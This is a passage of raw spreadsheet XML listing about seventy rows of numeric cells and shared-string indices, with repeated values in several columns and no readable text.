      <c r="B22379" s="2">
        <v>5.7590827E7</v>
      </c>
      <c r="C22379" s="2" t="s">
        <v>21613</v>
      </c>
      <c r="D22379" s="2">
        <v>1.0</v>
      </c>
      <c r="E22379" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22379" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22380" ht="15.75" customHeight="1">
      <c r="A22380" s="1">
        <v>10556.0</v>
      </c>
      <c r="B22380" s="2">
        <v>1.2677765E7</v>
      </c>
      <c r="C22380" s="2" t="s">
        <v>21614</v>
      </c>
      <c r="D22380" s="2">
        <v>1.0</v>
      </c>
      <c r="E22380" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22380" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22381" ht="15.75" customHeight="1">
      <c r="A22381" s="1">
        <v>10596.0</v>
      </c>
      <c r="B22381" s="2">
        <v>1.3520867E7</v>
      </c>
      <c r="C22381" s="2" t="s">
        <v>21615</v>
      </c>
      <c r="D22381" s="2">
        <v>1.0</v>
      </c>
      <c r="E22381" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22381" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22382" ht="15.75" customHeight="1">
      <c r="A22382" s="1">
        <v>10631.0</v>
      </c>
      <c r="B22382" s="2">
        <v>1.3961317E7</v>
      </c>
      <c r="C22382" s="2" t="s">
        <v>21616</v>
      </c>
      <c r="D22382" s="2">
        <v>1.0</v>
      </c>
      <c r="E22382" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22382" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22383" ht="15.75" customHeight="1">
      <c r="A22383" s="1">
        <v>10637.0</v>
      </c>
      <c r="B22383" s="2">
        <v>1.41132E7</v>
      </c>
      <c r="C22383" s="2" t="s">
        <v>21617</v>
      </c>
      <c r="D22383" s="2">
        <v>1.0</v>
      </c>
      <c r="E22383" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22383" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22384" ht="15.75" customHeight="1">
      <c r="A22384" s="1">
        <v>10700.0</v>
      </c>
      <c r="B22384" s="2">
        <v>1.485711E7</v>
      </c>
      <c r="C22384" s="2" t="s">
        <v>21618</v>
      </c>
      <c r="D22384" s="2">
        <v>1.0</v>
      </c>
      <c r="E22384" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22384" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22385" ht="15.75" customHeight="1">
      <c r="A22385" s="1">
        <v>10750.0</v>
      </c>
      <c r="B22385" s="2">
        <v>1.5469822E7</v>
      </c>
      <c r="C22385" s="2" t="s">
        <v>21619</v>
      </c>
      <c r="D22385" s="2">
        <v>1.0</v>
      </c>
      <c r="E22385" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22385" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22386" ht="15.75" customHeight="1">
      <c r="A22386" s="1">
        <v>10792.0</v>
      </c>
      <c r="B22386" s="2">
        <v>1.571245E7</v>
      </c>
      <c r="C22386" s="2" t="s">
        <v>21620</v>
      </c>
      <c r="D22386" s="2">
        <v>1.0</v>
      </c>
      <c r="E22386" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22386" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22387" ht="15.75" customHeight="1">
      <c r="A22387" s="1">
        <v>10909.0</v>
      </c>
      <c r="B22387" s="2">
        <v>1.6675889E7</v>
      </c>
      <c r="C22387" s="2" t="s">
        <v>21621</v>
      </c>
      <c r="D22387" s="2">
        <v>1.0</v>
      </c>
      <c r="E22387" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22387" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22388" ht="15.75" customHeight="1">
      <c r="A22388" s="1">
        <v>10917.0</v>
      </c>
      <c r="B22388" s="2">
        <v>1.673137E7</v>
      </c>
      <c r="C22388" s="2" t="s">
        <v>21622</v>
      </c>
      <c r="D22388" s="2">
        <v>1.0</v>
      </c>
      <c r="E22388" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22388" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22389" ht="15.75" customHeight="1">
      <c r="A22389" s="1">
        <v>10945.0</v>
      </c>
      <c r="B22389" s="2">
        <v>1.7071027E7</v>
      </c>
      <c r="C22389" s="2" t="s">
        <v>21623</v>
      </c>
      <c r="D22389" s="2">
        <v>1.0</v>
      </c>
      <c r="E22389" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22389" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22390" ht="15.75" customHeight="1">
      <c r="A22390" s="1">
        <v>11124.0</v>
      </c>
      <c r="B22390" s="2">
        <v>1.9006064E7</v>
      </c>
      <c r="C22390" s="2" t="s">
        <v>21624</v>
      </c>
      <c r="D22390" s="2">
        <v>1.0</v>
      </c>
      <c r="E22390" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22390" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22391" ht="15.75" customHeight="1">
      <c r="A22391" s="1">
        <v>11166.0</v>
      </c>
      <c r="B22391" s="2">
        <v>1.9619683E7</v>
      </c>
      <c r="C22391" s="2" t="s">
        <v>21625</v>
      </c>
      <c r="D22391" s="2">
        <v>1.0</v>
      </c>
      <c r="E22391" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22391" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22392" ht="15.75" customHeight="1">
      <c r="A22392" s="1">
        <v>11237.0</v>
      </c>
      <c r="B22392" s="2">
        <v>2.0411155E7</v>
      </c>
      <c r="C22392" s="2" t="s">
        <v>21626</v>
      </c>
      <c r="D22392" s="2">
        <v>1.0</v>
      </c>
      <c r="E22392" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22392" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22393" ht="15.75" customHeight="1">
      <c r="A22393" s="1">
        <v>11305.0</v>
      </c>
      <c r="B22393" s="2">
        <v>2.0992696E7</v>
      </c>
      <c r="C22393" s="2" t="s">
        <v>21627</v>
      </c>
      <c r="D22393" s="2">
        <v>1.0</v>
      </c>
      <c r="E22393" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22393" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22394" ht="15.75" customHeight="1">
      <c r="A22394" s="1">
        <v>11358.0</v>
      </c>
      <c r="B22394" s="2">
        <v>2.1332513E7</v>
      </c>
      <c r="C22394" s="2" t="s">
        <v>21628</v>
      </c>
      <c r="D22394" s="2">
        <v>1.0</v>
      </c>
      <c r="E22394" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22394" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22395" ht="15.75" customHeight="1">
      <c r="A22395" s="1">
        <v>11463.0</v>
      </c>
      <c r="B22395" s="2">
        <v>2.1946343E7</v>
      </c>
      <c r="C22395" s="2" t="s">
        <v>21629</v>
      </c>
      <c r="D22395" s="2">
        <v>1.0</v>
      </c>
      <c r="E22395" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22395" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22396" ht="15.75" customHeight="1">
      <c r="A22396" s="1">
        <v>11621.0</v>
      </c>
      <c r="B22396" s="2">
        <v>2.3095919E7</v>
      </c>
      <c r="C22396" s="2" t="s">
        <v>21630</v>
      </c>
      <c r="D22396" s="2">
        <v>1.0</v>
      </c>
      <c r="E22396" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22396" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22397" ht="15.75" customHeight="1">
      <c r="A22397" s="1">
        <v>11819.0</v>
      </c>
      <c r="B22397" s="2">
        <v>2.4590953E7</v>
      </c>
      <c r="C22397" s="2" t="s">
        <v>21631</v>
      </c>
      <c r="D22397" s="2">
        <v>1.0</v>
      </c>
      <c r="E22397" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22397" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22398" ht="15.75" customHeight="1">
      <c r="A22398" s="1">
        <v>11876.0</v>
      </c>
      <c r="B22398" s="2">
        <v>2.4976047E7</v>
      </c>
      <c r="C22398" s="2" t="s">
        <v>21632</v>
      </c>
      <c r="D22398" s="2">
        <v>1.0</v>
      </c>
      <c r="E22398" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22398" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22399" ht="15.75" customHeight="1">
      <c r="A22399" s="1">
        <v>11896.0</v>
      </c>
      <c r="B22399" s="2">
        <v>2.5169046E7</v>
      </c>
      <c r="C22399" s="2" t="s">
        <v>21633</v>
      </c>
      <c r="D22399" s="2">
        <v>1.0</v>
      </c>
      <c r="E22399" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22399" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22400" ht="15.75" customHeight="1">
      <c r="A22400" s="1">
        <v>11916.0</v>
      </c>
      <c r="B22400" s="2">
        <v>2.5255177E7</v>
      </c>
      <c r="C22400" s="2" t="s">
        <v>21634</v>
      </c>
      <c r="D22400" s="2">
        <v>1.0</v>
      </c>
      <c r="E22400" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22400" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22401" ht="15.75" customHeight="1">
      <c r="A22401" s="1">
        <v>11917.0</v>
      </c>
      <c r="B22401" s="2">
        <v>2.5260007E7</v>
      </c>
      <c r="C22401" s="2" t="s">
        <v>21635</v>
      </c>
      <c r="D22401" s="2">
        <v>1.0</v>
      </c>
      <c r="E22401" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22401" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22402" ht="15.75" customHeight="1">
      <c r="A22402" s="1">
        <v>12055.0</v>
      </c>
      <c r="B22402" s="2">
        <v>2.6437577E7</v>
      </c>
      <c r="C22402" s="2" t="s">
        <v>21636</v>
      </c>
      <c r="D22402" s="2">
        <v>1.0</v>
      </c>
      <c r="E22402" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22402" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22403" ht="15.75" customHeight="1">
      <c r="A22403" s="1">
        <v>12059.0</v>
      </c>
      <c r="B22403" s="2">
        <v>2.6495666E7</v>
      </c>
      <c r="C22403" s="2" t="s">
        <v>21637</v>
      </c>
      <c r="D22403" s="2">
        <v>1.0</v>
      </c>
      <c r="E22403" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22403" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22404" ht="15.75" customHeight="1">
      <c r="A22404" s="1">
        <v>12294.0</v>
      </c>
      <c r="B22404" s="2">
        <v>2.8269474E7</v>
      </c>
      <c r="C22404" s="2" t="s">
        <v>21638</v>
      </c>
      <c r="D22404" s="2">
        <v>1.0</v>
      </c>
      <c r="E22404" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22404" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22405" ht="15.75" customHeight="1">
      <c r="A22405" s="1">
        <v>12405.0</v>
      </c>
      <c r="B22405" s="2">
        <v>2.8997681E7</v>
      </c>
      <c r="C22405" s="2" t="s">
        <v>21639</v>
      </c>
      <c r="D22405" s="2">
        <v>1.0</v>
      </c>
      <c r="E22405" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22405" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22406" ht="15.75" customHeight="1">
      <c r="A22406" s="1">
        <v>12655.0</v>
      </c>
      <c r="B22406" s="2">
        <v>3.0416224E7</v>
      </c>
      <c r="C22406" s="2" t="s">
        <v>21640</v>
      </c>
      <c r="D22406" s="2">
        <v>1.0</v>
      </c>
      <c r="E22406" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22406" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22407" ht="15.75" customHeight="1">
      <c r="A22407" s="1">
        <v>12888.0</v>
      </c>
      <c r="B22407" s="2">
        <v>3.2023828E7</v>
      </c>
      <c r="C22407" s="2" t="s">
        <v>21641</v>
      </c>
      <c r="D22407" s="2">
        <v>1.0</v>
      </c>
      <c r="E22407" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22407" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22408" ht="15.75" customHeight="1">
      <c r="A22408" s="1">
        <v>12906.0</v>
      </c>
      <c r="B22408" s="2">
        <v>3.2107977E7</v>
      </c>
      <c r="C22408" s="2" t="s">
        <v>21642</v>
      </c>
      <c r="D22408" s="2">
        <v>1.0</v>
      </c>
      <c r="E22408" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22408" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22409" ht="15.75" customHeight="1">
      <c r="A22409" s="1">
        <v>12962.0</v>
      </c>
      <c r="B22409" s="2">
        <v>3.2505116E7</v>
      </c>
      <c r="C22409" s="2" t="s">
        <v>21643</v>
      </c>
      <c r="D22409" s="2">
        <v>1.0</v>
      </c>
      <c r="E22409" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22409" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22410" ht="15.75" customHeight="1">
      <c r="A22410" s="1">
        <v>13001.0</v>
      </c>
      <c r="B22410" s="2">
        <v>3.2812659E7</v>
      </c>
      <c r="C22410" s="2" t="s">
        <v>21644</v>
      </c>
      <c r="D22410" s="2">
        <v>1.0</v>
      </c>
      <c r="E22410" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22410" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22411" ht="15.75" customHeight="1">
      <c r="A22411" s="1">
        <v>13312.0</v>
      </c>
      <c r="B22411" s="2">
        <v>3.4539809E7</v>
      </c>
      <c r="C22411" s="2" t="s">
        <v>21645</v>
      </c>
      <c r="D22411" s="2">
        <v>1.0</v>
      </c>
      <c r="E22411" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22411" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22412" ht="15.75" customHeight="1">
      <c r="A22412" s="1">
        <v>13568.0</v>
      </c>
      <c r="B22412" s="2">
        <v>3.5699829E7</v>
      </c>
      <c r="C22412" s="2" t="s">
        <v>21646</v>
      </c>
      <c r="D22412" s="2">
        <v>1.0</v>
      </c>
      <c r="E22412" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22412" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22413" ht="15.75" customHeight="1">
      <c r="A22413" s="1">
        <v>13590.0</v>
      </c>
      <c r="B22413" s="2">
        <v>3.57353E7</v>
      </c>
      <c r="C22413" s="2" t="s">
        <v>21647</v>
      </c>
      <c r="D22413" s="2">
        <v>1.0</v>
      </c>
      <c r="E22413" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22413" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22414" ht="15.75" customHeight="1">
      <c r="A22414" s="1">
        <v>13593.0</v>
      </c>
      <c r="B22414" s="2">
        <v>3.5766435E7</v>
      </c>
      <c r="C22414" s="2" t="s">
        <v>21648</v>
      </c>
      <c r="D22414" s="2">
        <v>1.0</v>
      </c>
      <c r="E22414" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22414" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22415" ht="15.75" customHeight="1">
      <c r="A22415" s="1">
        <v>13653.0</v>
      </c>
      <c r="B22415" s="2">
        <v>3.5944947E7</v>
      </c>
      <c r="C22415" s="2" t="s">
        <v>21649</v>
      </c>
      <c r="D22415" s="2">
        <v>1.0</v>
      </c>
      <c r="E22415" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22415" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22416" ht="15.75" customHeight="1">
      <c r="A22416" s="1">
        <v>13663.0</v>
      </c>
      <c r="B22416" s="2">
        <v>3.5984789E7</v>
      </c>
      <c r="C22416" s="2" t="s">
        <v>21650</v>
      </c>
      <c r="D22416" s="2">
        <v>1.0</v>
      </c>
      <c r="E22416" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22416" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22417" ht="15.75" customHeight="1">
      <c r="A22417" s="1">
        <v>13754.0</v>
      </c>
      <c r="B22417" s="2">
        <v>3.6486449E7</v>
      </c>
      <c r="C22417" s="2" t="s">
        <v>21651</v>
      </c>
      <c r="D22417" s="2">
        <v>1.0</v>
      </c>
      <c r="E22417" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22417" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22418" ht="15.75" customHeight="1">
      <c r="A22418" s="1">
        <v>14020.0</v>
      </c>
      <c r="B22418" s="2">
        <v>3.7478731E7</v>
      </c>
      <c r="C22418" s="2" t="s">
        <v>21652</v>
      </c>
      <c r="D22418" s="2">
        <v>1.0</v>
      </c>
      <c r="E22418" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22418" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22419" ht="15.75" customHeight="1">
      <c r="A22419" s="1">
        <v>14037.0</v>
      </c>
      <c r="B22419" s="2">
        <v>3.7504815E7</v>
      </c>
      <c r="C22419" s="2" t="s">
        <v>21653</v>
      </c>
      <c r="D22419" s="2">
        <v>1.0</v>
      </c>
      <c r="E22419" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22419" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22420" ht="15.75" customHeight="1">
      <c r="A22420" s="1">
        <v>14134.0</v>
      </c>
      <c r="B22420" s="2">
        <v>3.7917609E7</v>
      </c>
      <c r="C22420" s="2" t="s">
        <v>21654</v>
      </c>
      <c r="D22420" s="2">
        <v>1.0</v>
      </c>
      <c r="E22420" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22420" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22421" ht="15.75" customHeight="1">
      <c r="A22421" s="1">
        <v>14145.0</v>
      </c>
      <c r="B22421" s="2">
        <v>3.7954186E7</v>
      </c>
      <c r="C22421" s="2" t="s">
        <v>21655</v>
      </c>
      <c r="D22421" s="2">
        <v>1.0</v>
      </c>
      <c r="E22421" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22421" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22422" ht="15.75" customHeight="1">
      <c r="A22422" s="1">
        <v>14205.0</v>
      </c>
      <c r="B22422" s="2">
        <v>3.825096E7</v>
      </c>
      <c r="C22422" s="2" t="s">
        <v>21656</v>
      </c>
      <c r="D22422" s="2">
        <v>1.0</v>
      </c>
      <c r="E22422" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22422" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22423" ht="15.75" customHeight="1">
      <c r="A22423" s="1">
        <v>14212.0</v>
      </c>
      <c r="B22423" s="2">
        <v>3.8271604E7</v>
      </c>
      <c r="C22423" s="2" t="s">
        <v>21657</v>
      </c>
      <c r="D22423" s="2">
        <v>1.0</v>
      </c>
      <c r="E22423" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22423" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22424" ht="15.75" customHeight="1">
      <c r="A22424" s="1">
        <v>14290.0</v>
      </c>
      <c r="B22424" s="2">
        <v>3.8509235E7</v>
      </c>
      <c r="C22424" s="2" t="s">
        <v>21658</v>
      </c>
      <c r="D22424" s="2">
        <v>1.0</v>
      </c>
      <c r="E22424" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22424" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22425" ht="15.75" customHeight="1">
      <c r="A22425" s="1">
        <v>14337.0</v>
      </c>
      <c r="B22425" s="2">
        <v>3.878771E7</v>
      </c>
      <c r="C22425" s="2" t="s">
        <v>21659</v>
      </c>
      <c r="D22425" s="2">
        <v>1.0</v>
      </c>
      <c r="E22425" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22425" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22426" ht="15.75" customHeight="1">
      <c r="A22426" s="1">
        <v>14365.0</v>
      </c>
      <c r="B22426" s="2">
        <v>3.8954712E7</v>
      </c>
      <c r="C22426" s="2" t="s">
        <v>21660</v>
      </c>
      <c r="D22426" s="2">
        <v>1.0</v>
      </c>
      <c r="E22426" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22426" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22427" ht="15.75" customHeight="1">
      <c r="A22427" s="1">
        <v>14417.0</v>
      </c>
      <c r="B22427" s="2">
        <v>3.9242947E7</v>
      </c>
      <c r="C22427" s="2" t="s">
        <v>21661</v>
      </c>
      <c r="D22427" s="2">
        <v>1.0</v>
      </c>
      <c r="E22427" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22427" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22428" ht="15.75" customHeight="1">
      <c r="A22428" s="1">
        <v>14534.0</v>
      </c>
      <c r="B22428" s="2">
        <v>3.9835264E7</v>
      </c>
      <c r="C22428" s="2" t="s">
        <v>21662</v>
      </c>
      <c r="D22428" s="2">
        <v>1.0</v>
      </c>
      <c r="E22428" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22428" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22429" ht="15.75" customHeight="1">
      <c r="A22429" s="1">
        <v>14555.0</v>
      </c>
      <c r="B22429" s="2">
        <v>3.9969049E7</v>
      </c>
      <c r="C22429" s="2" t="s">
        <v>21663</v>
      </c>
      <c r="D22429" s="2">
        <v>1.0</v>
      </c>
      <c r="E22429" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22429" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22430" ht="15.75" customHeight="1">
      <c r="A22430" s="1">
        <v>14600.0</v>
      </c>
      <c r="B22430" s="2">
        <v>4.0237307E7</v>
      </c>
      <c r="C22430" s="2" t="s">
        <v>21664</v>
      </c>
      <c r="D22430" s="2">
        <v>1.0</v>
      </c>
      <c r="E22430" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22430" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22431" ht="15.75" customHeight="1">
      <c r="A22431" s="1">
        <v>14645.0</v>
      </c>
      <c r="B22431" s="2">
        <v>4.0365209E7</v>
      </c>
      <c r="C22431" s="2" t="s">
        <v>21665</v>
      </c>
      <c r="D22431" s="2">
        <v>1.0</v>
      </c>
      <c r="E22431" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22431" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22432" ht="15.75" customHeight="1">
      <c r="A22432" s="1">
        <v>14655.0</v>
      </c>
      <c r="B22432" s="2">
        <v>4.0419317E7</v>
      </c>
      <c r="C22432" s="2" t="s">
        <v>21666</v>
      </c>
      <c r="D22432" s="2">
        <v>1.0</v>
      </c>
      <c r="E22432" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22432" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22433" ht="15.75" customHeight="1">
      <c r="A22433" s="1">
        <v>14667.0</v>
      </c>
      <c r="B22433" s="2">
        <v>4.045149E7</v>
      </c>
      <c r="C22433" s="2" t="s">
        <v>21667</v>
      </c>
      <c r="D22433" s="2">
        <v>1.0</v>
      </c>
      <c r="E22433" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22433" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22434" ht="15.75" customHeight="1">
      <c r="A22434" s="1">
        <v>14744.0</v>
      </c>
      <c r="B22434" s="2">
        <v>4.0712355E7</v>
      </c>
      <c r="C22434" s="2" t="s">
        <v>21668</v>
      </c>
      <c r="D22434" s="2">
        <v>1.0</v>
      </c>
      <c r="E22434" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22434" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22435" ht="15.75" customHeight="1">
      <c r="A22435" s="1">
        <v>14754.0</v>
      </c>
      <c r="B22435" s="2">
        <v>4.079527E7</v>
      </c>
      <c r="C22435" s="2" t="s">
        <v>21669</v>
      </c>
      <c r="D22435" s="2">
        <v>1.0</v>
      </c>
      <c r="E22435" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22435" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22436" ht="15.75" customHeight="1">
      <c r="A22436" s="1">
        <v>14757.0</v>
      </c>
      <c r="B22436" s="2">
        <v>4.0796939E7</v>
      </c>
      <c r="C22436" s="2" t="s">
        <v>21670</v>
      </c>
      <c r="D22436" s="2">
        <v>1.0</v>
      </c>
      <c r="E22436" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22436" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22437" ht="15.75" customHeight="1">
      <c r="A22437" s="1">
        <v>14860.0</v>
      </c>
      <c r="B22437" s="2">
        <v>4.1067553E7</v>
      </c>
      <c r="C22437" s="2" t="s">
        <v>21671</v>
      </c>
      <c r="D22437" s="2">
        <v>1.0</v>
      </c>
      <c r="E22437" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22437" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22438" ht="15.75" customHeight="1">
      <c r="A22438" s="1">
        <v>14888.0</v>
      </c>
      <c r="B22438" s="2">
        <v>4.1127494E7</v>
      </c>
      <c r="C22438" s="2" t="s">
        <v>21672</v>
      </c>
      <c r="D22438" s="2">
        <v>1.0</v>
      </c>
      <c r="E22438" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22438" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22439" ht="15.75" customHeight="1">
      <c r="A22439" s="1">
        <v>15094.0</v>
      </c>
      <c r="B22439" s="2">
        <v>4.1791629E7</v>
      </c>
      <c r="C22439" s="2" t="s">
        <v>21673</v>
      </c>
      <c r="D22439" s="2">
        <v>1.0</v>
      </c>
      <c r="E22439" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22439" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22440" ht="15.75" customHeight="1">
      <c r="A22440" s="1">
        <v>15097.0</v>
      </c>
      <c r="B22440" s="2">
        <v>4.1792183E7</v>
      </c>
      <c r="C22440" s="2" t="s">
        <v>21674</v>
      </c>
      <c r="D22440" s="2">
        <v>1.0</v>
      </c>
      <c r="E22440" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22440" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22441" ht="15.75" customHeight="1">
      <c r="A22441" s="1">
        <v>15147.0</v>
      </c>
      <c r="B22441" s="2">
        <v>4.1953632E7</v>
      </c>
      <c r="C22441" s="2" t="s">
        <v>21675</v>
      </c>
      <c r="D22441" s="2">
        <v>1.0</v>
      </c>
      <c r="E22441" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22441" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22442" ht="15.75" customHeight="1">
      <c r="A22442" s="1">
        <v>15171.0</v>
      </c>
      <c r="B22442" s="2">
        <v>4.2006239E7</v>
      </c>
      <c r="C22442" s="2" t="s">
        <v>21676</v>
      </c>
      <c r="D22442" s="2">
        <v>1.0</v>
      </c>
      <c r="E22442" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22442" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22443" ht="15.75" customHeight="1">
      <c r="A22443" s="1">
        <v>15238.0</v>
      </c>
      <c r="B22443" s="2">
        <v>4.2259032E7</v>
      </c>
      <c r="C22443" s="2" t="s">
        <v>21677</v>
      </c>
      <c r="D22443" s="2">
        <v>1.0</v>
      </c>
      <c r="E22443" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22443" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22444" ht="15.75" customHeight="1">
      <c r="A22444" s="1">
        <v>15258.0</v>
      </c>
      <c r="B22444" s="2">
        <v>4.2301416E7</v>
      </c>
      <c r="C22444" s="2" t="s">
        <v>21678</v>
      </c>
      <c r="D22444" s="2">
        <v>1.0</v>
      </c>
      <c r="E22444" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22444" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22445" ht="15.75" customHeight="1">
      <c r="A22445" s="1">
        <v>15380.0</v>
      </c>
      <c r="B22445" s="2">
        <v>4.2769939E7</v>
      </c>
      <c r="C22445" s="2" t="s">
        <v>21679</v>
      </c>
      <c r="D22445" s="2">
        <v>1.0</v>
      </c>
      <c r="E22445" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22445" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22446" ht="15.75" customHeight="1">
      <c r="A22446" s="1">
        <v>15421.0</v>
      </c>
